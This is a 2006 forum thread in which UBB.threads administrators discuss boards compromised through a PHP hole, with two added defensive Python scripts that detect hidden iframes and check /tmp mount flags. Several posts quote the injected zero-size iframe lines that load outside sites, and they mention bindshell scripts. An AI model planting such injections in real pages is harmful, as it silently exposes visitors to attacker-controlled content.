Hacked ubbthread board (6.5.2) #128608 05/03/2006 5:51 PM
Joined: Jun 2006
Posts: 23
misho Offline OP
stranger
Last night my board (running 6.5.2) got hacked and I can't figure out how.
At the end of all index.php, index.html files and ubbthreads.php there were the following two lines added:

<html><iframe src=http://neoffic.com/t/?id=soauker width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>
<html><iframe src=http://neoffic.com/t/?id=soauker width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>

Some users complained about popups and slow pages and that is how I found out that my board is compromised.

Actually, since I run many other virtual servers on the same server, all their index files were modified as well. So I think this guy has spent lots of time to find them (I have about 80 gigs of data in a zillion files). The modified time was identical on all compromised files.

Did anyone have a similar issue? I googled it and it appears that other ubbthreads boards were targets of this attack as well.

My board is under heavy traffic and it is near to impossible to analyze the webserver logs.

Any idea how to patch ubbthreads against such attacks?
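
A sweep for the tampering described in this post, as an added example (not part of the original thread or of UBB.threads): it reads the tail of each index.php, index.html and ubbthreads.php, flags any iframe with a zero width or height, and groups hits by modification time, since the post notes that all compromised files shared one timestamp. The sample tree, the `injected.example` URL and the function names are constructed for illustration.

```python
import os
import re
import tempfile
from collections import defaultdict

IFRAME_RE = re.compile(rb"<iframe\b[^>]*>", re.I)
# width/height of 0, quoted or not; "S?" also catches the "Sheight" form in the post
ZERO_DIM_RE = re.compile(rb"[\s\"']S?(?:width|height)\s*=\s*[\"']?0(?![0-9.])", re.I)
SRC_RE = re.compile(rb"\ssrc\s*=\s*[\"']?([^\s\"'>]+)", re.I)
# File names the post says were modified
TARGETS = re.compile(r"^(?:index\.(?:php|html?)|ubbthreads\.php)$", re.I)


def hidden_iframes(data):
    """Return the src of every iframe in `data` that has a zero width or height."""
    hits = []
    for tag in IFRAME_RE.findall(data):
        if ZERO_DIM_RE.search(tag):
            m = SRC_RE.search(tag)
            hits.append(m.group(1).decode("latin-1") if m else "")
    return hits


def scan(root, tail_bytes=4096):
    """Map mtime -> [(path, srcs)] for index files whose tail holds a hidden iframe."""
    by_mtime = defaultdict(list)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not TARGETS.match(name):
                continue
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
                with open(path, "rb") as fh:
                    fh.seek(max(0, st.st_size - tail_bytes))  # injection was appended
                    srcs = hidden_iframes(fh.read())
            except OSError:
                continue  # unreadable file: skip it, keep sweeping
            if srcs:
                by_mtime[int(st.st_mtime)].append((path, srcs))
    return dict(by_mtime)


def demo():
    """Constructed tree: two vhosts tampered in one pass, one clean page."""
    bad = (b"<?php /* board */ ?>\n<html><iframe src=http://injected.example/t/?id=x "
           b"width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>\n")
    good = b'<html><iframe src="/map.html" width="600" height="400"></iframe></html>\n'
    layout = {"vhost-a/index.php": bad, "vhost-b/ubbthreads.php": bad,
              "vhost-c/index.html": good}
    with tempfile.TemporaryDirectory() as root:
        for rel, body in layout.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(body)
            os.utime(path, (1146700000, 1146700000))  # same second for all files
        found = scan(root)
        return {ts: sorted(os.path.relpath(p, root).replace(os.sep, "/")
                           for p, _ in hits) for ts, hits in found.items()}


if __name__ == "__main__":
    for ts, paths in demo().items():
        print(ts, len(paths), "files changed in the same second:", paths)
```

A bucket holding many files from unrelated virtual hosts with one identical mtime is the signature of a scripted pass, and that timestamp is the place to start in the web server logs.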

Re: Hacked ubbthread board (6.5.2) #128609 05/03/2006 6:03 PM
Joined: Jun 2006
Posts: 23
misho Offline OP
stranger
Well, I've just noticed another hacked board of a user of these forums - http://threadsdev.net

Poor fella has 4 iframes that almost locked out my computer. I had only 2.

I think this evil genius is finding his targets using Google. Maybe a simple filename renaming of the key files like ubbthreads.php could help for now?

Re: Hacked ubbthread board (6.5.2) #128610 05/03/2006 6:07 PM
Joined: Jun 2006
Posts: 9,243
Rick Offline
Former Developer
Check this thread:

http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/4560063

There is a fix for the security hole that is being used.

Re: Hacked ubbthread board (6.5.2) #128611 05/03/2006 6:16 PM
Joined: Jun 2006
Posts: 23
misho Offline OP
stranger
Thanks! I have just stumbled on it as well.

Re: Hacked ubbthread board (6.5.2) #128612 05/03/2006 7:27 PM
Joined: Apr 2006
Posts: 116
fatalpapercut Offline
member
I followed the neoffic link and it took me to http://www.ixwebhosting.com/

Here is the chat session with one of their operators:

Chat Information: Please wait for a site operator to respond.
Chat Information: You are now chatting with 'Satish Manem'
Satish Manem: Hello, how may I help you today?
you: Do you know anything about recent Hack Attack on UBB boards?
Satish Manem: I've read that last week was the worst in the history of hacking for hack attacks, and the target is Windows.
you: Well I have got the address of your website from the data that was left behind by hackers
you: how can you explain this?
Satish Manem: Do you mean we involve in hacking?
you: I don't know, are you?
Satish Manem: I am sorry, we are hosting services providers.
Satish Manem: We just provide the hosting space for the domains.
you: I can see that, but your information now is pasted all over the hacked BBSes, why?
Satish Manem: I have no idea about that.
you: Am I the first person to tell you this?
Satish Manem: Yes
you: Hahaha you are full of [censored]
you: Are you not going to respond to this?
Satish Manem: Let me know if you have any other queries regarding hosting?
you: Why should I? You already look dodgy, and now you lie through your teeth, why would I be interested in your hosting?

That was it, sorry :)

Re: Hacked ubbthread board (6.5.2) #128613 05/03/2006 8:43 PM
Joined: Jun 2006
Posts: 742
JoshPet Offline
enthusiast
I had 5 hacked Threads boards today myself. Thanks for the fix!!


Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com
Re: Hacked ubbthread board (6.5.2) #128614 05/04/2006 1:07 AM
Joined: Jun 2006
Posts: 3,837
Ian Offline
Carpal Tunnel
Thanks - I think we escaped - but are now patched :)

Re: Hacked ubbthread board (6.5.2) #128615 05/04/2006 1:09 AM
Joined: Jun 2006
Posts: 742
JoshPet Offline
enthusiast
I had to patch just over 50 installs at VertexHost.com and uncompromise a couple of servers.


Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com
Re: Hacked ubbthread board (6.5.2) #128616 05/04/2006 1:20 AM
Joined: Jun 2006
Posts: 3,837
Ian Offline
Carpal Tunnel
I can find no evidence of it on any of our servers - mind you I have had enough hacking attempts recently to last a lifetime LOL

Re: Hacked ubbthread board (6.5.2) #128617 05/05/2006 12:30 PM
Joined: May 2006
Posts: 5
David Gentry Offline
stranger
We also had this problem and I'm glad to see it wasn't just us. My sys admin said that the modification required root access. Does this sound consistent or plausible?

Re: Hacked ubbthread board (6.5.2) #128618 05/05/2006 1:36 PM
Joined: Jun 2006
Posts: 9,243
Rick Offline
Former Developer
Hi David. Was your sysadmin saying that the hacker required root access? If that's the case, then no. It allowed them access to anything the webserver could write to. At that point on some servers they uploaded a pwned or bindz script that could be started. I still haven't been able to get my hands on either of these scripts to see what they actually do.

Re: Hacked ubbthread board (6.5.2) #128619 05/05/2006 2:47 PM
Joined: Apr 2006
Posts: 116
fatalpapercut Offline
member
Why don't you post them here so we all can have a look?

Re: Hacked ubbthread board (6.5.2) #128620 05/05/2006 4:59 PM
Joined: Jun 2006
Posts: 23
misho Offline OP
stranger
I have followed the hacker's links and downloaded bindz plus the tools he used. They are, I must say, pretty good. Let me know if you want to see them and I will send you the link. (Don't want to post them here because... well you know why.)

Re: Hacked ubbthread board (6.5.2) #128621 05/05/2006 9:04 PM
Joined: May 2004
Posts: 38
HuntAmerica.com Offline
newbie
I also was hacked, and yesterday I applied the patch that was listed here: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/4560078/

However, I was hacked again after those two patches were applied. If I go to the admin panel and close my forums, can I still be hacked?

And is there other forum software that is less vulnerable than what Infopop has produced?

Re: Hacked ubbthread board (6.5.2) #128622 05/05/2006 11:15 PM
Joined: Jun 2006
Posts: 9,243
Rick Offline
Former Developer
You'll probably want to grab 6.5.4. It's possible that the one script that was found to be potentially vulnerable was used. It's also very possible that there were backdoors left from the original hack. Usually if someone gets in, they will always try and leave themselves a backdoor. Do you have access to your server error logs? If so, you can look there to see any unusual requests for clues.

As for less vulnerable software: unfortunately this seems to happen to just about all of them from time to time. Do a quick scan of Google and you'll see there have been security releases of this nature put out for just about all the major products. If there is a hole anywhere it will be found. It would be best if the hole was never there, but unfortunately it was and the only thing we can do is get a fix out promptly, which we did.

Steps are being taken in the way version 7 has been developed to help in the security area. We've been doing this long enough now that we know what the common oversights are that usually cause these problems and will be doing everything we can to prevent them in the future.

Re: Hacked ubbthread board (6.5.2) #128623 05/06/2006 8:14 AM
Joined: May 2004
Posts: 38
HuntAmerica.com Offline
newbie
Rick, I have submitted a support ticket to get the security patches up thru version 6.5.4

Re: Hacked ubbthread board (6.5.2) #128624 05/06/2006 8:40 AM
Joined: Jun 2006
Posts: 9,243
Rick Offline
Former Developer
Great, I'll go and get you the fix.

Re: Hacked ubbthread board (6.5.2) #128625 05/06/2006 2:15 PM
Joined: Apr 2006
Posts: 116
fatalpapercut Offline
member
Rick, what does register_globals do? Is it like use strict in Perl? I would like to know just in case I have to fix other scripts that don't like it.

Re: Hacked ubbthread board (6.5.2) #128626 05/06/2006 2:19 PM
Joined: Apr 2006
Posts: 116
fatalpapercut Offline
member
Ah, ok, I googled for it and

"...From PHP 4.2 onwards, the default behaviour of PHP is to have register_globals set to off..."

Re: Hacked ubbthread board (6.5.2) #128627 05/06/2006 3:59 PM
Joined: Jun 2006
Posts: 9,243
Rick Offline
Former Developer
It defaults to off, but you'll still find it set to On quite often. It's a good idea to check and see what the setting is for your install just in case.

Re: Hacked ubbthread board (6.5.2) #128628 05/07/2006 7:01 AM
Joined: Oct 2006
Posts: 12
Thwala Offline
stranger

I have the following error when I apply the fix and perform the upgrade:

"The following files are reporting a wrong version:"

all changed files are then listed despite the fact that I have uploaded the latest files (version 6.5.4) onto my server.

Is something preventing me from applying the fix?

Re: Hacked ubbthread board (6.5.2) #128629 05/07/2006 9:42 AM
Joined: Jun 2006
Posts: 9,243
Rick Offline
Former Developer
Hi Thwala. Try looking at the comment section (first 10-15 lines) of one of the changed files that you uploaded. Make sure that they say # File Version 6.5.4 in that section.

If they all have that, then we can do a manual upgrade for you. Really it's just a matter of uploading the changed files and then running one db command.

Re: Hacked ubbthread board (6.5.2) #128630 05/09/2006 2:09 PM
Joined: May 2006
Posts: 5
David Gentry Offline
stranger
Rick,

After speaking with my sysadmin in more detail he is pretty sure that root access was obtained via the bindz script. If you want to talk to him directly I would be happy to send his contact info along.

[quote]Hi David. Was your sysadmin saying that the hacker required root access? If that's the case, then no. It allowed them access to anything the webserver could write to. At that point on some servers they uploaded a pwned or bindz script that could be started. I still haven't been able to get my hands on either of these scripts to see what they actually do.[/quote]

Re: Hacked ubbthread board (6.5.2) #128631 05/09/2006 5:44 PM
Joined: Aug 2004
Posts: 458
Conrad Offline
Addict
Rick, for the 6.5.4 upgrade that you mentioned, is there a short list of the lines of code that should be added just like for 6.5.3 where you mentioned two files and what needs to be changed within them?

For instance in showflat is define('SHOWPOST',1); the only thing that needs to be added? Is it also ok to do this for 6.5.2 or 6.5.1?

Re: Hacked ubbthread board (6.5.2) #128632 05/09/2006 6:11 PM
Joined: Jun 2006
Posts: 9,243
Rick Offline
Former Developer
Unfortunately there's not a list; for the most part it's the same type of quick fixes. I've kept this information off the public forums so as not to provide any info to potential troublemakers, so that everyone can upgrade. If you need the exact changes, just open up a support ticket and I can give you more info.

Re: Hacked ubbthread board (6.5.2) #128633 05/10/2006 5:36 AM
Joined: Aug 2004
Posts: 458
Conrad Offline
Addict
Thanks man, Josh sent me the exact changes via a PM on threadsdev.net.

I noticed a strange file in my threads folder: bindtty

I downloaded it and erased it straight away but have no idea whether it was just uploaded by someone or whether it was part of the file restore that I ran on my server. Hmmm...

Will the file come in handy, does someone want to take a look at it? Can any information be gained from it?

Re: Hacked ubbthread board (6.5.2) #128634 05/10/2006 8:05 AM
Joined: Jun 2006
Posts: 956
Zarzal Offline
Old Hand
"I suspect bindtty is just a bindshell that opens port 5299 and allows people to connect to your server as whatever user the program is run at.

If it's in an ikonboard dir I expect they've hacked you via some insecure script and got in as your httpd uid. Might be worth doing a further search around your system to see if they've done anything else."

found with Google.


my board: http://www.dragonclan-forum.de
my hobby: http://www.biker-reise.de
I can help with questions about UBBthreads in German, or at least try
Re: Hacked ubbthread board (6.5.2) #128635 05/10/2006 12:57 PM
Joined: Jun 2006
Posts: 15,844
Gizmo Offline
UBB.threads Developer
bindtty is, in most cases, a malicious script; if you did not put it there, it is not bundled with any Infopop product (to my knowledge).


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Re: Hacked ubbthread board (6.5.2) #128636 05/10/2006 1:22 PM
Joined: Aug 2004
Posts: 458
Conrad Offline
Addict
I know that someone put it there without my knowledge. No doubt about it.

But can we find anything out about the people responsible by analysing the file?

Re: Hacked ubbthread board (6.5.2) #128637 05/10/2006 3:53 PM
Joined: Jun 2006
Posts: 956
Zarzal Offline
Old Hand
It's a generic file; just Google for it and you will find many sources. It's part of a root kit. You have to analyse your server log files to find out where it comes from. I guess it comes from Brasilia ....

You can do nothing.

Erase this file, check the server for any kind of rootkit, don't allow the execution of scripts from the /tmp folder, apply any PHP patch (5.1.4 is current), turn globals off and check any script running on your server for updates.

There are many scripts out there with security holes. I found a gallery script on my server with possible XSS holes. Threads closed many holes and I continue my checks.

Watch your server error log file frequently.


my board: http://www.dragonclan-forum.de
my hobby: http://www.biker-reise.de
I can help with questions about UBBthreads in German, or at least try
Re: Hacked ubbthread board (6.5.2) #128638 05/10/2006 4:28 PM
Joined: Aug 2004
Posts: 458
Conrad Offline
Addict
[quote]don't allow the execution of scripts from the /tmp folder[/quote]

How does wiping the folder clean sound?

I just chucked out all this stats mumbo jumbo and emptied the entire folder. Does that help? :)

Just out of curiosity, is it still true that no Threads board has been hacked with the globals turned off?

Re: Hacked ubbthread board (6.5.2) #128639 05/10/2006 5:17 PM
Joined: Jul 2006
Posts: 2,143
David Dreezer Offline
Pooh-Bah
[quote]How does wiping the folder clean sound?[/quote]

Doesn't mean something won't be put in there 5 minutes from now. Your server is supposed to use /tmp. It's temporary workspace. What you want to do though, is ensure that things put in there can't be used improperly. Removing script execution goes a long way toward achieving that.


This thread for sale. Click here!
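
One way to verify the "no execution from /tmp" advice above, as an added example (not from the thread): it parses `/proc/mounts`, finds the mount that actually holds a path, and lists which of `noexec`, `nosuid` and `nodev` are missing. The sample mount tables and function names are constructed; checking `nosuid`, `nodev` and `/var/tmp` goes beyond what the post asks for.

```python
import posixpath

WANTED = ("noexec", "nosuid", "nodev")

# Constructed /proc/mounts samples: /tmp on the root filesystem vs. its own mount.
WEAK = """\
/dev/sda1 / ext3 rw,relatime 0 0
proc /proc proc rw,nosuid,nodev,noexec 0 0
/dev/sda3 /var ext3 rw,nosuid 0 0
"""
HARDENED = WEAK + "tmpfs /tmp tmpfs rw,nosuid,nodev,noexec 0 0\n"


def parse_mounts(text):
    """Parse /proc/mounts text into (mountpoint, fstype, option-set) tuples."""
    mounts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # malformed or empty line
        mountpoint = parts[1].replace("\\040", " ")  # kernel escapes spaces as \040
        mounts.append((mountpoint, parts[2], set(parts[3].split(","))))
    return mounts


def covering_mount(path, mounts):
    """Return the entry whose mountpoint is the longest prefix of `path`."""
    path = posixpath.normpath(path)
    best, best_len = None, -1
    for entry in mounts:
        mp = entry[0].rstrip("/") or "/"
        inside = mp == "/" or path == mp or path.startswith(mp + "/")
        if inside and len(mp) >= best_len:  # >=: a later mount shadows an earlier one
            best, best_len = entry, len(mp)
    return best


def missing_flags(path, mounts_text):
    """List the hardening options absent from the mount that holds `path`."""
    entry = covering_mount(path, parse_mounts(mounts_text))
    if entry is None:
        raise ValueError("no mount covers " + path)
    return [flag for flag in WANTED if flag not in entry[2]]


if __name__ == "__main__":
    # On a live Linux host, read the real table instead of the samples.
    try:
        with open("/proc/mounts") as fh:
            table = fh.read()
    except OSError:
        table = WEAK
    for p in ("/tmp", "/var/tmp"):
        gaps = missing_flags(p, table)
        print(p, "OK" if not gaps else "missing: " + ",".join(gaps))
    # Fix, when /tmp is its own mount:  mount -o remount,noexec,nosuid,nodev /tmp
    # noexec blocks execve() of files on the mount; an interpreter invoked as
    # `php /tmp/x.php` or `sh /tmp/x` still reads and runs the script.
```

Directory mode bits are a separate matter: the execute bit on a directory governs traversal, so the control that stops binaries from running out of /tmp is the `noexec` mount option.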
Re: Hacked ubbthread board (6.5.2) #128640 05/11/2006 2:55 AM
Joined: Aug 2004
Posts: 458
Conrad Offline
Addict
Hi Dave, do you mean changing the permissions for the folder, or also for files inside it?

The folder is set to 700. Should I also disable the "execute" attribute for the owner and make it 600?

Re: Hacked ubbthread board (6.5.2) #128641 05/11/2006 7:03 AM
Joined: Jun 2006
Posts: 869
Stan Offline
old hand
I turned off the globals, as per code given a week ago or so.

Got hacked day before yesterday

<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

Makes me wonder if they got our domain address by coming here...


http://clubadventist.com/forums

No longer following the carrot
Re: Hacked ubbthread board (6.5.2) #128642 05/11/2006 9:38 AM
Joined: Jun 2006
Posts: 869
Stan Offline
old hand
am eager to try the alpha or beta 7.0 version.

Re: Hacked ubbthread board (6.5.2) #128643 05/11/2006 1:01 PM
Joined: Jun 2006
Posts: 956
Zarzal Offline
Old Hand
As I see, you use 6.5.1.1.
Get 6.5.4 or open a ticket to get information for another fix. There is still another hole in the system that can be used to hack your forum.
Or did you apply the 2 fixes and get hacked again?


my board: http://www.dragonclan-forum.de
my hobby: http://www.biker-reise.de
I can help with questions about UBBthreads in German, or at least try
Re: Hacked ubbthread board (6.5.2) #128644 05/11/2006 1:24 PM
Joined: Jun 2006
Posts: 3,837
Ian Offline
Carpal Tunnel
[quote]I turned off the globals, as per code given a week ago or so.

Got hacked day before yesterday

<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

Makes me wonder if they got our domain address by coming here...[/quote]

More likely just via google or similar.

Re: Hacked ubbthread board (6.5.2) #128645 05/12/2006 1:00 AM
Joined: May 2004
Posts: 6
patrickegan Offline
stranger
I found this guy

soauker@gmail.com. He hacked my site today and admitted doing it. I tried to get Google to give up his details. They told me to go !#@ myself.

This guy soauker is a member of a cyber hacker group and has actually even reported a few php vulnerabilities in phpnuke in the past.

His gig is to run up the CPM impressions on some banners that someone is paying him to run. I'd pay him to leave my site alone.. Yeah either that or burn his house down and sow salt on the land so that nothing would ever grow there again.

Re: Hacked ubbthread board (6.5.2) #128646 05/12/2006 6:56 AM
Joined: Jun 2006
Posts: 869
Stan Offline
old hand
One of our members did a "go back" click and it showed which domains it is clicking on; this may be useful:
http://clubadventist.com/clickback.png


http://clubadventist.com/forums

No longer following the carrot
Re: Hacked ubbthread board (6.5.2) #128647 05/12/2006 9:09 AM
Joined: Apr 2006
Posts: 116
fatalpapercut Offline
member
You guys are still using Internet Explorer? Then you have no right to complain about security! ;)
